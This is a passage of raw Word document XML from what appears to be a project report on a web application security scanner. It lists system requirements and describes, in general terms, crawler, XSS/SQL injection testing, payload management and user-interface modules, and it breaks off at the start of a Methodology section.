          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> GB for caches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="24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1024x768 minimum screen resolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc15396"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Software Specifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">LINUX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Operating System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> / Virtual Workspace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="24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Web Browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Chrome Driver </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc23386"/>
      <w:bookmarkStart w:id="60" w:name="_Toc43339148"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Modules of This Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1. Crawler Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The crawler module serves as the backbone of the web application security scanner, </w:t>
      </w:r>
      <w:r>
        <w:t>responsible for traversing the target web application, identifying input fields, and extracting relevant information for vulnerability assessment. Key functionalities include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>URL Navigation</w:t>
      </w:r>
      <w:r>
        <w:t>: Navigates through the target URLs to discover web pages and forms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Input Field Identification</w:t>
      </w:r>
      <w:r>
        <w:t>: Identifies input fields such as textboxes, text areas, and buttons for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Session Handling</w:t>
      </w:r>
      <w:r>
        <w:t>: Manages user sessions for authenticated scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Cookie Management</w:t>
      </w:r>
      <w:r>
        <w:t>: Handles cookies to maintain session state during scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2. Injection Module (XSS and SQL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The injection module simulates various injection attacks, including Cross-Site Scripting (XSS) and SQL Injection, to assess the security posture of the target web application. Features include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Payload Injection</w:t>
      </w:r>
      <w:r>
        <w:t>: Injects payloads into input fields to test for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>XSS Injection</w:t>
      </w:r>
      <w:r>
        <w:t>: Executes XSS payloads to determine if the application is susceptible to XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t>: Executes SQL payloads to identify potential SQL Injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r>
        <w:t>: Detects and handles unexpected alerts or errors during injection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3. Payload Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The payload module provides a repository of predefined payloads used during injection testing. This module enables customization of payloads and facilitates efficient testing of various injection scenarios. Key functionalities include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Payload Management</w:t>
      </w:r>
      <w:r>
        <w:t>: Manages a collection of XSS and SQL payloads for injection testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Payload Customization</w:t>
      </w:r>
      <w:r>
        <w:t>: Allows users to define and customize payloads based on specific testing requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Payload Selection</w:t>
      </w:r>
      <w:r>
        <w:t>: Dynamically selects payloads based on injection context and target application characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4. Help Module (User Interface)</w:t>
      </w:r>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 help module enhances user experience by providing intuitive user interfaces and assistance features. It ensures seamless interaction with the scanner and facilitates effective vulnerability identification and resolution. Features include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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User Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Enables users to register and log in securely to access scanner functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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Navigation Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Provides a user-friendly interface for navigating through the scanner functionalities and options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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Feedback Mechanism</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Allows users to submit feedback, report issues, and request assistance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Offers comprehensive documentation and guidance on scanner usage, features, and best practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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These modules collectively form the core components of the web application security scanner, enabling efficient and thorough assessment of web application vulnerabilities while providing a seamless user experience.</w:t>
      </w:r>
      <w:bookmarkStart w:id="61" w:name="_Toc43339154"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc16633"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>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The methodology involves:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
